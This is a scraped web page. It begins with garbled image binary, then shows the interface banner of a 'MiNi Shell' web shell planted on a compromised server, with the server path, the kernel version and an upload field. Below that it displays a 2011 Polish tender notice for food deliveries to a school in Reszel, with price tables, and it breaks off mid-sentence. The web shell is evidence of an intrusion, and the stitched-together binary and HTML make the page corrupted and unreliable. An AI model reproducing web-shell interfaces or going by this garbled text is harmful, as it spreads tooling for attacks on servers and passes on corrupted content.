JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111222/435898-N-2011.html

<p class="kh_header"><b>Reszel: Dostawy produktów spożywczych na żywienie   
   Gimnazjum nr 1 w Reszlu</b><br>
<b>Numer ogłoszenia: 435898 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum Nr 1 im. Adama Mickiewicza w Reszlu , ul. Chrobrego 5A, 11-440 Reszel, woj. warmińsko-mazurskie, tel. 89 7550037, faks 89 7550992.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Edukacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy produktów spożywczych na żywienie   
   Gimnazjum nr 1 w Reszlu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę   
   wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 7
2.1Przedmiot zamówienia w zakresie zadania część nr 1 dotyczy:
   Produkty zwierzęce, mięso i produkty mięsne, kod CPV 15100000-9
                                                 Produkty drobiowe, kod CPV 15131500-0
   Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony   
   w formularzu cenowym, który stanowi załącznik nr 2 na Zadanie część nr 1 do SIWZ.
2.2Przedmiot zamówienia w zakresie zadania część nr 2 dotyczy:
Różne produkty spożywcze, kod CPV 15800000-6
Produkty przemiału ziarna, kod CPV 15610000-7
Oleje i tłuszcze zwierzęce lub roślinne, kod CPV 15400000-2
                           Produkty cukrownicze kod CPV 15833000-6
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 2 do SIWZ.
2.3Przedmiot zamówienia w zakresie zadania część nr 3 dotyczy:
   Owoce warzywa i produkty podobne, kod CPV 15300000-1 
                                   Owoce tropikalne, kod CPV 03222110-7    
  Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony    
  w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 3 do SIWZ. 
  Ze względu na zamawianie niektórych towarów w sztukach oraz ceny za 1 sztukę do obliczenia 
  ceny będzie się przyjmować że waga wynosi nie mniej niż:
1. Kapusta biała 1 szt. - 3 kg  a w okresie maj czerwiec 2kg
2. Kapusta włoska 1 szt. - 2 kg
3. Kapusta czerwona 1 szt. - 2 kg
4. Por 1 szt. - 0,25 kg
5. Rzodkiewka 1 pęczek - 0,15 kg
6. Sałata 1 szt. - 0,20 kg
7. Szczypior 1 szt. - 0,10 kg
8. Koper 1 szt. - 0,10 kg
9. Natka pietruszki 1 szt. - 0,10 kg
10. Kalafior świeży 1 szt. - 1,2 kg
11. Brokuł świeży 1 szt. - 1,0 kg
12. Czosnek 1 szt. - 0,05 kg
13. Botwina 1 pęczek- 0,20 kg
14. Kiwi 1szt.- 0,11 kg
Również towar zamawiany w kilogramach musi wymagać wymogom jak dla I wyboru.
2.4Przedmiot zamówienia w zakresie zadania część nr 4 dotyczy:
     Produkty mleczarskie, kod CPV 15500000-3 
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony   
     w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 4 do SIWZ.
2.5Przedmiot zamówienia w zakresie zadania część nr 5 dotyczy:
     Ryby przetworzone i konserwowane, kod CPV 15200000-0
                    Produkty głęboko mrożone, kod CPV 158960000-5
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
     formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 5 do  SIWZ.
2.6.Przedmiot zamówienia w zakresie zadania część nr 6 dotyczy:
      Pieczywo świeże wyroby piekarskie i ciastkarskie kod CPV 15810000-9
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
      formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 6 do  SIWZ.
2.7.Przedmiot zamówienia w zakresie zadania część nr 7 dotyczy:
      Jaja kurze konsumpcyjne świeże klasa A  kod CPV 03142500-3
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
      formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 7 do  SIWZ.
3.Wymienione wyżej załączniki stanowią integralną część SIWZ z zastrzeżeniem, że wszystkie   
   wskazane z nazwy produkty, (wyroby) spożywcze należy rozumieć jako określenie wymaganych   
   parametrów asortymentowych, zdrowotnych i jakościowych, również w zakresie wielkości 
   opakowań dotyczących każdej części zamówienia. Oznacza to, że zgodnie z art. 29 Ustawy, na 
   wskazane z nazwy produkty spożywcze, zamawiający dopuszcza zastosowanie równoważnych 
   produktów spożywczych, nie gorszej jakości niż opisane w załączniku nr 2. Ciężar   
   udowodnienia, że produkty spożywcze są równoważne w stosunku do wymogu określonego przez    
   zamawiającego spoczywa na składającym ofertę. W takim wypadku wykonawca musi przedłożyć  
   odpowiednie dokumenty dopuszczające dane produkt spożywczy do spożycia, oraz pozwalające 
   jednoznacznie stwierdzić, że są one rzeczywiście równoważne. 
   Przez ofertę równoważną Zamawiający rozumie:
   Gramatura oferowanego produktu równoważnego nie może być niższa niż gramatura produktu   
   wskazanego w formularzu. Zaoferowane produkty równoważne muszą posiadać te same walory   
   organoleptyczne (smak, zapach, barwa, estetyka, konsystencja) oraz zawierać w swoim składzie 
   te same surowce użyte do produkcji co produkt określony przez Zamawiającego.
4.Zamawiający dopuszcza możliwość składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek powyższy zostanie spełniony, jeżeli wykonawca złoży oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru załącznik nr 1 2.Wypełniony i podpisany formularz cenowy - z wykorzystaniem wzoru załącznik nr 2 zadanie nr należy wpisać nr zadania3.Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 3 4. Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art.24 ust. 1 ust. Pzp, według wzoru załącznik nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zamawiający zastrzega sobie możliwość wprowadzania zmian do umowy w zakresie zmniejszania ilości i wartości dostaw w sytuacjach, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia (np. zmniejszenie stanów żywionych). Zamawiający nie będą ponosili ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie. 2)W przypadku ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy, strony dopuszczają możliwość zmiany stawek podatkowych zgodnie z obowiązującymi przepisami. 3)Załączniki nr 2 stanowiące integralną część SIWZ i wszystkie wskazane w nich z nazwy produkty, (wyroby) spożywcze należy rozumieć jako określenie wymaganych parametrów asortymentowych, zdrowotnych i jakościowych, również w zakresie wielkości opakowań dotyczących każdej części zamówienia. Oznacza to, że zgodnie z art. 29 Ustawy, na wskazane z nazwy produkty spożywcze, zamawiający dopuszcza zastosowanie równoważnych produktów spożywczych, nie gorszej jakości niż opisane w załączniku nr 2. Ciężar udowodnienia, że produkty spożywcze są równoważne w stosunku do wymogu określonego przez zamawiającego spoczywa na składającym ofertę. W takim wypadku wykonawca musi przedłożyć odpowiednie dokumenty dopuszczające dane produkt spożywczy do spożycia, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. 4)Cena poszczególnych produktów określona w formularzu cenowym Wykonawcy, stanowiącym załącznik nr 2 do umowy, może ulec zmianie w przypadku udokumentowanej zmiany ceny produktu na podstawie klauzuli waloryzacyjnej. 5)Klauzula waloryzacyjna. Cena towaru określona w umowie, w czasie wykonywania zamówienia (w okresie obowiązywania umowy) może być korygowana (w górę lub w dół) na pisemny wniosek jednej ze stron, o wskaźnik zmiany cen żywności dotyczący przedmiotu zamówienia publikowany przez Główny Urząd Statystyczny (GUS) lub Wojewódzki Urząd Statystyczny (WUS) przedstawiany wraz z uzasadnieniem w formie pisemnej (wyciąg wskaźnika zmian cen z GUS lub WUS). Wskaźniki wzrostu cen żywności stanowią podstawę do wprowadzenia nowej ceny w formie aneksu do umowy na dostawy. Nowa cena obowiązuje od dnia podpisania aneksu do umowy z zastrzeżeniem, że pierwsza waloryzacja może nastąpić nie wcześniej niż po 1 miesiącu od dnia podpisania umowy. Strony dopuszczają waloryzację jeżeli zmiana wskaźnika cen przekroczy 2%. 6)Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy 7)Zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy 8)Wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. 9)Do umowy wprowadza się klauzulę: sposób wykonania przedmiotu zamówienia lub termin dostarczenia towaru może ulec zmianie w przypadku zaistnienia przyczyn nie leżących po stronie Wykonawcy lub Zamawiającego, np. udokumentowanego ogólnego braku na rynku jakiegoś asortymentu produktów spożywczych lub wielkości opakowań, Wykonawca może po uzgodnieniu i uzyskaniu aprobaty przez osobę prowadzącą zapotrzebowania dla stołówki szkolnej dokumentując zaistniałą przyczynę, dostarczyć produkt podobny, równoważny lub w innej wielkości opakowania, w cenie podanej w formularzu cenowym po przeliczeniu na aktualną wielkość opakowania lub towaru z zastrzeżeniem że termin dostarczenia towaru nie może być dłuższy niż 3 dni. O zaistniałym fakcie Wykonawca zobowiązany jest w następnym dniu po otrzymaniu zapotrzebowania na towar, pisemnie powiadomić upoważnionego pracownika szkoły do przekazywania zamówień wykonawcy, pod rygorem zastosowania kar umownych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.reszel.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminna Administracja Szkół i Sportu w Reszlu ul. Reymonta 1-4, 11-440 Reszel..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2011 godzina 10:00, miejsce: W sekretariacie Gminnej Administracji Szkół i Sportu w Reszlu, ul. Reymonta 1-4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1Przedmiot zamówienia w zakresie zadania część nr 1 dotyczy:
   Produkty zwierzęce, mięso i produkty mięsne, kod CPV 15100000-9
                                                 Produkty drobiowe, kod CPV 15131500-0
   Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony   
   w formularzu cenowym, który stanowi załącznik nr 2 na Zadanie część nr 1 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Kości schabowe	70	700	kg			
2	Korpus z kurczaka	10	110	kg			
3	Łopatka b/k	100	900	kg			
4	Szynka b/k	20	180	kg			
5	Smalec wieprzowy kostka 200g	10	120	kg			
6	Słonina	40	400	kg			
7	Golonka wieprzowa	5	20	kg			
8	Żeberka wieprzowe	20	20	kg			
9	Filet z kurczaka b/k	60	600	kg			
10	Ćwiartka z kurczaka	80	800	kg			
11	Skrzydełka z kurczaka	30	60	kg			
12	Wątróbka drobiowa	15	60	kg			
13	Boczek wędzony	2	12	kg			
14	Karkówka b/k	25	50	kg			
15	Schab b/k	25	50	kg			
16	Kiełbasa piwna podsuszana(mięso wieprz.min.80%,wołowe min.10%,z indyka min10%)	1	6	kg			
17	Kiełbasa pieprzowa(60%wieprzowe)	1	6	kg			
18	Kiełbasa krakowska sucha(wieprz.55%,z indyka 35%,wołowe 10%)	1	6	kg			
19	Sopelek drobiowy(mięso z kury 78%)	1	6	kg			
20	Polędwica z warzywami(mięso z piersi indyka 30%)	1	6	kg			
21	Kiełbasa francuska(mięso wieprz.62%,wołowe 6%)	5	35	kg			
22	Schab krotoszyński((wieprz. 73,5%)	1	6	kg			
23	Szynka pyszna(wieprz.65%)	1	6	kg			
24	Paluszki drobiowe(mięso drobiowe 27,4%)	3	45	kg			
25	Kiełbasa parówkowa(mięso wieprz.40%,mięso drobiowe 27%)	21	210	kg			
26	Pasztet podlaski(100g)	30	330	szt			
                                                                                                 Ogółem: *	X	X			
* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać  do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2Przedmiot zamówienia w zakresie zadania część nr 2 dotyczy:
Różne produkty spożywcze, kod CPV 15800000-6
Produkty przemiału ziarna, kod CPV 15610000-7
Oleje i tłuszcze zwierzęce lub roślinne, kod CPV 15400000-2
                           Produkty cukrownicze kod CPV 15833000-6
Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 2 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Sos pieczeniowy ciemny(38g)	10	50	szt			
2	Sos do spaghetti(47g)	10	60	szt			
3	Zupa borowikowa(45g)	10	40	szt			
4	Zupa biały barszcz(65g)	10	100	szt			
5	Zupa ogonowa(40g)	10	70	szt			
6	Przyprawa do bigosu i dań z kapusty(20G)	2	20	szt			
7	Przyprawa do ryb(20g)	4	20	szt			
8	Przyprawa do kurczaka(20g)	13	130	szt			
9	Ziele angielskie(15g)	2	20	szt			
10	Papryka ostra(20g)	2	15	szt			
11	Czosnek suszony granulowany(20g)	2	20	szt			
12	Delikat do mięs (75g)	3	30	szt			
13	Przyprawa uniwersalna(200g)	32	320	szt			
14	Kwasek cytrynowy(20g)	27	270	szt			
15	Przyprawa do mięsa mielonego(30g)	5	50	szt			
16	Papryka słodka(20g)	8	80	szt			
17	Natka pietruszki susz(10g)	2	20	szt			
18	Liść laurowy(8g)	2	20	szt			
19	Majeranek(10g)	2	20	szt			
20	Przyprawa do flaków i gulaszu(20g)	2	20	szt			
21	Pieprz czarny mielony(20g)	25	250	szt			
22	Kostka mięsna(60g)	1	10	szt			
23	Rosół drobiowy(120g)	15	150	szt			
24	Koncentrat pomidorowy 30%(1kg)	10	100	szt			
25	Makaron(nitka,świderka,spaghetti,łazanka,kolanko z falbanką)400g	60	600	kg			
26 	Zacierka babuni(250g)	5	50	szt			
27	Kasza jęczmienna średnia(400g)	10	80	kg			
28	Magi w płynie(960g)	10	100	szt			
29	Cukier(1kg)	35	350	kg			
30	Mąka(1kg)	25	250	kg			
31	Herbata w saszetkach(100szt)	3	15	szt			
32	Płatki(kółka,muszelki,kulki,gwiazdki)	8	80	szt			
33	Olej(1L)	30	300	szt			
34	Dżem(truskawkowy,wiśniowy)	10	100	szt			
35	Krem czekoladowy(200g)	5	50	szt			
36	Ryż długoziarnisty(1kg)	10	100	szt			
37	Sól gruba 1kg	25	250	szt			
38	Kakao(300g)	5	50	szt			
39	Musztarda(190g)	3	30	szt			
40	Majonez(815g)	25	250	szt			
41	Ketchup(500g)	8	80	szt			
42	Syrop(malinowy,truskawkowy)630g	110	1100	szt			
43	Drożdże świeże(100g)	2	20	szt			
44	Cukier puder(500g)	2	10	szt			
45	Aromat do ciast(5ml)	1	7	szt			
46	Cukier waniliowy(32g)	3	30	szt			
47	Mąka ziemniaczana(500g)	1	6	szt			
48	Zioła prowansalskie(10g)	2	20	szt			
49	Sok owocowy(300ml)różne smaki	150	750	szt			
50	Margaryna z masłem(500g)	30	300	szt			
51	Rodzynki(100g)	1	10	szt			
52	Kisiel(różne smaki)	5	20	szt			
53 	Przyprawa do potraw z ziemniaków(20g)	2	8	szt			
54	Czekolada(100g)	140	140	szt			
55	Baton(47g)	140	140	szt			
56	Masło(200g)	5	50	szt			
57	Woda mineralna gazowana(1,5l)	250	250	szt			
58	Woda mineralna niegazowana(1,5l)	250	250	szt			
59	Kawa rozpuszczalna(200g)	5	5	szt			
60	Kawa sypana(500g)	5	5	szt			
61	Ciasto	15	15	kg			
62	Sok owocowy(2l)	30	30	szt			
63	Sos sałatkowy(40g)	20	20	szt			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać  do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.00.00-7, 15.40.00.00-2, 15.83.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 3 dotyczy:
   Owoce warzywa i produkty podobne, kod CPV 15300000-1 
                                   Owoce tropikalne, kod CPV 03222110-7    
  Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony    
  w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 3 do SIWZ. 
  Ze względu na zamawianie niektórych towarów w sztukach oraz ceny za 1 sztukę do obliczenia 
  ceny będzie się przyjmować że waga w.</p>
